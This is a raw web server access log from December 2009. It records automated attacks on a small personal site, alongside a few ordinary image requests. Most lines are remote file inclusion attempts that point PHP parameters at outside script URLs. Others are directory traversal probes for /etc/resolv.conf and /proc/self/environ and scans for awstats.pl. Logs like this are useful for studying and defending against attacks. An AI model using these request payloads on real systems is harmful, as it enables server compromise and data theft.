207.119.153.189 - - [13/Dec/2009:10:46:55 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.st-owners.com/forums/showthread.php?t=72916&page=2" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.dmulk.com"
85.214.140.176 - - [13/Dec/2009:10:47:22 -0800] "GET /logs/access_080710.log/index.php?sayfa=http://teamirc.no-ip.org/karma/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.140.176 - - [13/Dec/2009:10:47:22 -0800] "GET /logs/index.php?sayfa=http://teamirc.no-ip.org/karma/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.140.176 - - [13/Dec/2009:10:47:23 -0800] "GET /logs/access_080426.log/index.php?sayfa=http://teamirc.no-ip.org/karma/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.140.176 - - [13/Dec/2009:10:47:25 -0800] "GET /index.php?sayfa=http://teamirc.no-ip.org/karma/id.txt???? HTTP/1.1" 200 14806 "-" "libwww-perl/5.813" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:47:31 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:47:31 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:47:36 -0800] "GET /logs/access_081226.log///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:10:48:58 -0800] "GET /index.php?main=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 14923 "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:10:49:00 -0800] "GET /index.php?main=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 14926 "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:10:49:02 -0800] "GET /index.php?main=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 14919 "-" "-" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:10 -0800] "GET /logs/access_081112.log/index.php?menu=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:10 -0800] "GET /logs/access_081112.log/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:10 -0800] "GET /logs/access_081112.log/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:10 -0800] "GET /logs/access_081112.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:11 -0800] "GET /index.php?menu=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 200 14801 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:12 -0800] "GET /index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 14890 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:13 -0800] "GET /index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 14887 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:13 -0800] "GET /errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:49:25 -0800] "GET /logs/access_091203.log%20%20///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:49:40 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:49:40 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:49:40 -0800] "GET /logs/access_080619.log///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:49:48 -0800] "GET /logs/access_091007.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:49:48 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:49:48 -0800] "GET /logs/access_090413.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:49:48 -0800] "GET /logs/access_090429.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:49:48 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:49:51 -0800] "GET /logs/access_081029.log///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:49:52 -0800] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:59 -0800] "GET /logs/access_080904.log/index.php?menu=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:59 -0800] "GET /logs/access_080904.log/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:59 -0800] "GET /logs/access_080904.log/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:10:49:59 -0800] "GET /logs/access_080904.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:50:04 -0800] "GET /logs/access_091007.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:50:08 -0800] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:50:08 -0800] "GET /logs/access_091007.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:50:08 -0800] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:50:46 -0800] "GET /logs/access_091007.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:50:46 -0800] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:50:47 -0800] "GET /logs/access_091007.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:10:50:47 -0800] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://withkor.net/snapshot/lo1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [13/Dec/2009:10:51:11 -0800] "GET /logs/access_090512.log//load_phplib.php?_PHPLIB[libdir]=http://med.buu.ac.th//administrator/components/com_users/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.72.130 - - [13/Dec/2009:10:51:12 -0800] "GET /load_phplib.php?_PHPLIB[libdir]=http://med.buu.ac.th//administrator/components/com_users/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.72.130 - - [13/Dec/2009:10:51:12 -0800] "GET /logs//load_phplib.php?_PHPLIB[libdir]=http://med.buu.ac.th//administrator/components/com_users/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.72.130 - - [13/Dec/2009:10:51:50 -0800] "GET /logs/access_090731.log//load_phplib.php?_PHPLIB[libdir]=http://med.buu.ac.th//administrator/components/com_users/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:10:51:57 -0800] "GET /logs/access_080425.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:10:52:01 -0800] "GET /logs/access_080425.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:52:04 -0800] "GET /logs/access_090126.log%20%20///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:52:16 -0800] "GET /logs/access_081226.log%20%20///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.203.208.203 - - [13/Dec/2009:10:52:24 -0800] "GET /logs/access_080425.log%20%20///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:52:39 -0800] "GET /logs/access_080619.log%20%20///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:52:45 -0800] "GET /logs/access_081029.log%20%20///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:53:43 -0800] "GET /config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:53:43 -0800] "GET /logs/access_080213.log/config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:53:44 -0800] "GET /logs/access_080207.log/config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:53:44 -0800] "GET /logs/config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:53:58 -0800] "GET /logs/config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:53:58 -0800] "GET /logs/access_080213.log%20%20/config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:53:58 -0800] "GET /config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:53:58 -0800] "GET /logs/access_080207.log%20%20/config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:10:54:35 -0800] "GET /logs/access_091203.log///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:43 -0800] "GET /awstats/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:44 -0800] "GET /awstat/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:45 -0800] "GET /stats/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:45 -0800] "GET /stat/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:46 -0800] "GET /awstats-cgi/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:46 -0800] "GET /awstats/cgi-bin/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:47 -0800] "GET /cgi-bin/awstat/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:47 -0800] "GET /cgi-bin/awstats/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:48 -0800] "GET /statistics/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:48 -0800] "GET /statistic/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:49 -0800] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:50 -0800] "GET /logs/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:50 -0800] "GET /webstats/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
122.224.4.112 - - [13/Dec/2009:10:54:51 -0800] "GET /awstats.pl HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:55:03 -0800] "GET /logs/access_090406.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:55:03 -0800] "GET /logs/access_090429.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.103.72.130 - - [13/Dec/2009:10:55:08 -0800] "GET /load_phplib.php?_PHPLIB[libdir]=http://med.buu.ac.th//administrator/components/com_users/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:10:55:13 -0800] "GET /logs/access_080425.log///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:10:55:17 -0800] "GET /logs/access_090717.log/admin/index.php?o=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:10:55:35 -0800] "GET /logs/access_080317.log/admin/index.php?o=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:56:30 -0800] "GET /logs/access_080213.log%20%20/config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:10:56:31 -0800] "GET /logs/access_080207.log%20%20/config.php?path_to_root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:10:56:55 -0800] "GET /logs/access_090126.log///skin/buzzard_espoon/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:10:57:33 -0800] "GET /logs/access_090717.log/admin/index.php?o=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.29.249.34 - - [13/Dec/2009:10:57:43 -0800] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.249.34 - - [13/Dec/2009:10:57:43 -0800] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.249.34 - - [13/Dec/2009:10:57:45 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.249.34 - - [13/Dec/2009:10:57:45 -0800] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.1" 200 287373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.249.34 - - [13/Dec/2009:10:57:47 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:10:57:50 -0800] "GET /logs/access_080317.log/admin/index.php?o=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.29.249.34 - - [13/Dec/2009:10:57:51 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:10:58:07 -0800] "GET /logs/access_090717.log/admin/index.php?o=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:10:58:36 -0800] "GET /logs/access_080317.log/admin/index.php?o=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:10:58:48 -0800] "GET /index.php?qry=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 14922 "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:10:58:49 -0800] "GET /index.php?qry=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 14925 "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:10:58:51 -0800] "GET /index.php?qry=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 14918 "-" "-" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:59:48 -0800] "GET /logs/access_090413.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:59:48 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:59:48 -0800] "GET /logs/access_090429.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:10:59:48 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
200.71.237.150 - - [13/Dec/2009:11:00:03 -0800] "GET /logs/access_080522.log/components/com_simpleboard/image_upload.php?sbp=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
200.71.237.150 - - [13/Dec/2009:11:00:03 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
200.71.237.150 - - [13/Dec/2009:11:00:04 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:00:59 -0800] "GET /logs/access_081226.log///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:00:59 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:01:00 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 14953 "-" "Mozilla/5.0" "www.dmulk.com"
200.71.237.150 - - [13/Dec/2009:11:01:05 -0800] "GET /logs/access_071122.log/components/com_simpleboard/image_upload.php?sbp=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.203.208.203 - - [13/Dec/2009:11:01:52 -0800] "GET /logs/access_091203.log///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:02:12 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:02:12 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:02:12 -0800] "GET /logs/access_080522.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:02:17 -0800] "GET /logs/access_071122.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
